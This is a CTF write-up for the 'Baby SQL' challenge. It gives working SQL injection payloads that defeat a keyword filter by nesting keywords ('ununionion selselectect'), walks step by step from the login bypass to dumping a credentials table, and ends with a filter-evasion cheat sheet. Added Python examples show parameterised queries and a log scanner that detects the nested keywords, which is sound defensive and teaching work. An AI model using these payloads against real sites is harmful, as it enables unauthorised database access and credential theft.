0x01 Subject
Baby SQL
=> injection vulnerability
0x02 Mind Palace
The hint here is => strict filtering has been applied => the key is bypassing it (maybe)
/check.php?username=xxx&password=xxx
select x,x from table where username = xxx and password = xxx
payload = /check.php?username=root%27+or+1%3D1%3B%23&password=root
But it feels like either the comment marker is filtered, or and/or are filtered
=> root%27+or+1%3D1%3B%23
| root' or 1=1;#
Suppose it is or that gets filtered; try URL-encoding it as %6f%72
=> root%27+%6f%72+1%3D1%3B%23
| root' or 1=1;#
Response: syntax error near 1=1;#'
Then maybe ; or # is being filtered?
=> root%27/**/%6f%72/**/1%3D1%3B%23
=> root%27/**/oorr/**/1%3D1%3B%23
=> root%27%2520oorr%25201%3D1%3B%23
| root'%20oorr%201=1;#
Response: Unknown column '20or' in 'where clause'
Looks like I just found something remarkable, emm
There is definitely a filter; the oorr bypass seems to work (the filter strips or exactly once, so oorr collapses to or)
Since the above was modified in the captured request, let's try entering it directly in the login form
root = root' oorr 1=1;#
payload => /check.php?username=root%27+oorr+1%3D1%3B%23&password=root
Bypass successful
Find the number of columns
/check.php?username=admin' order by 3%23&password=1
Response: error
Guess that by is also filtered; replace it with bbyy
root = admin' oorrder bbyy 3#
=> Login Success
root = admin' oorrder bbyy 4#
=> Error
So this table has three columns
Next step: find the echo points (the columns whose values are displayed)
root = admin' union select 1,2,3
=> Error, it is filtered and needs a bypass
UnIon SeLEcT fails => keep splicing strings => ununionion selselectect
root => 9' ununionion selselectect 1,2,3#
So column 2 and column 3 can be used as echo points
root => 9' ununionion selselectect 1,database(),version()#
=> database_name = geek
Next: use information_schema.tables
Enumerate which tables exist
root => 9' ununionion selselectect 999,999,group_concat(table_name) from information_schema.tables where table_schema=geek#
=> Error
Are from and where both filtered? Try both
from => frfromom; where => whwhereere
information_schema got mangled as well; oh, so or is filtered too (the or inside information), emm
root = 9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
/check.php?username=9%27+ununionion+selselectect+999%2C999%2Cgroup_concat%28table_name%29+frfromom+infoorrmation_schema.tables+whwhereere+table_schema%3D'geek'%23&password=1
Confident guess that the flag lives in the b4bsql table => enumerate column_name
root = 9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
(I'm numb, and also needs bypassing)
Then dump the data using these three columns
root = 9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
(I'm numb; if there is an error, most likely something was not bypassed, don't forget that: password itself contains or)
Got the flag
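The whole chain above works because the filter strips each keyword exactly once, so a keyword nested inside itself survives one pass. The following is an added example (not the challenge's check.php, whose source is not on this page): it models that single-pass filter as inferred from the evidence, checks whether the filter is a fixed point (a removal filter that changes its own output on a second pass is not trustworthy), and contrasts a string-built query guarded only by that filter with a parameterised query. The table, the sample row and the SQLite probe string (using `--` instead of the page's `#`, which SQLite does not treat as a comment) are constructed for the demo.

```python
import re
import sqlite3

# Keywords the challenge's filter appears to strip, inferred from the writeup's
# evidence (oorr -> or, bbyy -> by, ununionion -> union, ...). The real
# check.php source is not on the page, so this list and the single-pass
# removal are an assumed model of the filter, not the challenge's code.
BLOCKED = ["union", "select", "from", "where", "order", "by", "and", "or"]


def naive_filter(s: str) -> str:
    """Single-pass, case-insensitive keyword removal (the weak design)."""
    for kw in BLOCKED:
        s = re.sub(re.escape(kw), "", s, flags=re.IGNORECASE)
    return s


def filter_is_fixed_point(s: str) -> bool:
    """A removal filter is only trustworthy if re-applying it changes nothing.

    Returns False for nested keywords such as 'ununionion': the first pass
    turns it into 'union', and a second pass would strip that again.
    """
    once = naive_filter(s)
    return naive_filter(once) == once


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample table with the three-column layout the writeup found."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'root', 's3cret-sample')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """String-built query guarded only by the removal filter."""
    q = (
        "SELECT id, username, password FROM users "
        f"WHERE username = '{naive_filter(username)}' "
        f"AND password = '{naive_filter(password)}'"
    )
    return conn.execute(q).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: input is bound as data and never parsed as SQL."""
    q = "SELECT id, username, password FROM users WHERE username = ? AND password = ?"
    return conn.execute(q, (username, password)).fetchall()


if __name__ == "__main__":
    # The writeup's payloads survive one pass of the filter intact.
    print(naive_filter("admin' oorrder bbyy 4#"))   # admin' order by 4#
    print(filter_is_fixed_point("root' oorr 1=1;#"))  # False

    conn = build_demo_db()
    # SQLite variant of the page's login bypass (constructed: '--' instead of '#').
    probe = "root' oorr 1=1 --"
    print(login_vulnerable(conn, probe, "wrong"))  # root's row: the filter was defeated
    print(login_safe(conn, probe, "wrong"))        # []: the probe is just a literal string
```

The fixed-point check is a useful lint for any blocklist sanitiser, but the real fix is the last function: once the username and password travel as bound parameters, the spelling of `union` or `or` in the input no longer matters.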
0x03 Look Ahead
A short summary
- From the hint we know the SQL injection has strict filtering; by trial and error the bypass turned out to be hiding characters (nesting each keyword inside itself)
- Directly obtained username and password, but they held no useful information
- Learned the column count from the order by error: root = admin' oorrder bbyy 4#
- Found the echo points: root => 9' ununionion selselectect 1,2,3#
- Got basic database information: root => 9' ununionion selselectect 1,database(),version()#
- Enumerated table_name + column_names through the information_schema database:
- root = 9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
- root = 9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
- Then fetched the data using the known column_names:
- root = 9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
Potential methods for bypassing filters
IF spaces and comment markers such as --+ are filtered
Use multi-line (block) comments, a pair of parentheses, newline characters, or plus signs in place of spaces
IF specific keywords are filtered
0x01 Case variation
and => AnD
or => Or oR OR
0x02 Change the encoding
Use URL encoding: replace the 0x prefix of the character's ASCII hex code with %, e.g. the ASCII code of o is 0x6f, so its URL encoding is %6f
0x03 Insert comments
select => sel/**/ect
and => a/**/nd
0x04 Hide characters (nest the keyword inside itself)
select => selselectect
and => anandd
0x05 Use operator symbols
and => &&
or => ||
IF 數(shù)字被過(guò)濾
0x01 數(shù)據(jù)類型改變
1 => 1.0
3 => 3.0
IF relational operators are filtered
>
<
=> greatest() least()
=> where greatest(ascii(substr(database(),0,1)),64)=64
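From the defender's side, the character-hiding trick in 0x04 leaves a very recognisable trace: a keyword spelled as a prefix, the whole keyword, then the rest (`ununionion`, `selselectect`, `frfromom`, `oorr`, `bbyy`). The following is an added example, not part of the original writeup, that generates every such nested spelling for a keyword list and scans web-server access-log lines for them. The log lines are constructed for the demo, one of them carrying the writeup's own information_schema request.

```python
import re
from urllib.parse import unquote_plus

# Keywords whose nested spellings are worth flagging (same set the writeup bypassed).
KEYWORDS = ["union", "select", "from", "where", "order", "by", "and", "or"]


def nested_variants(kw: str) -> list:
    """Every way to hide kw inside itself: kw[:i] + kw + kw[i:], e.g. 'ununionion'."""
    return [kw[:i] + kw + kw[i:] for i in range(1, len(kw))]


# One compiled pattern per keyword covering all of its split points.
PATTERNS = {
    kw: re.compile("|".join(re.escape(v) for v in nested_variants(kw)))
    for kw in KEYWORDS
}

# Request target as it appears in a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')


def nested_keywords(raw_target: str) -> set:
    """Return the keywords whose nested form appears in the decoded request target."""
    decoded = unquote_plus(raw_target).lower()
    return {kw for kw, pat in PATTERNS.items() if pat.search(decoded)}


def scan_log(lines: list) -> list:
    """Return (line_number, matched_keywords) for each request that carries a
    keyword-nesting bypass attempt."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        found = nested_keywords(m.group(1))
        if found:
            hits.append((n, found))
    return hits


# Constructed sample log: a normal login, the writeup's information_schema
# request, and the writeup's order-by probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jan/2021:10:00:01 +0000] "GET /check.php?username=bob&password=hunter2 HTTP/1.1" 200 512',
    '10.0.0.5 - - [24/Jan/2021:10:00:02 +0000] "GET /check.php?username=9%27+ununionion+selselectect'
    '+999%2C999%2Cgroup_concat%28table_name%29+frfromom+infoorrmation_schema.tables+whwhereere'
    '+table_schema%3D%27geek%27%23&password=1 HTTP/1.1" 200 640',
    '10.0.0.5 - - [24/Jan/2021:10:00:03 +0000] "GET /check.php?username=admin%27+oorrder+bbyy+4%23&password=1 HTTP/1.1" 500 211',
]

if __name__ == "__main__":
    for line_no, found in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: nested keywords {sorted(found)}")
```

The decode step matters: the writeup's requests arrive with `+` for spaces and `%27` for quotes, so matching the raw line would miss them. Two-letter keywords yield only one nested form (`oorr`, `bbyy`), which are rare in ordinary text, but longer benign words can still collide with some variants, so treat a hit as a signal to inspect the request rather than as proof on its own.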
END(ˉ﹃ˉ)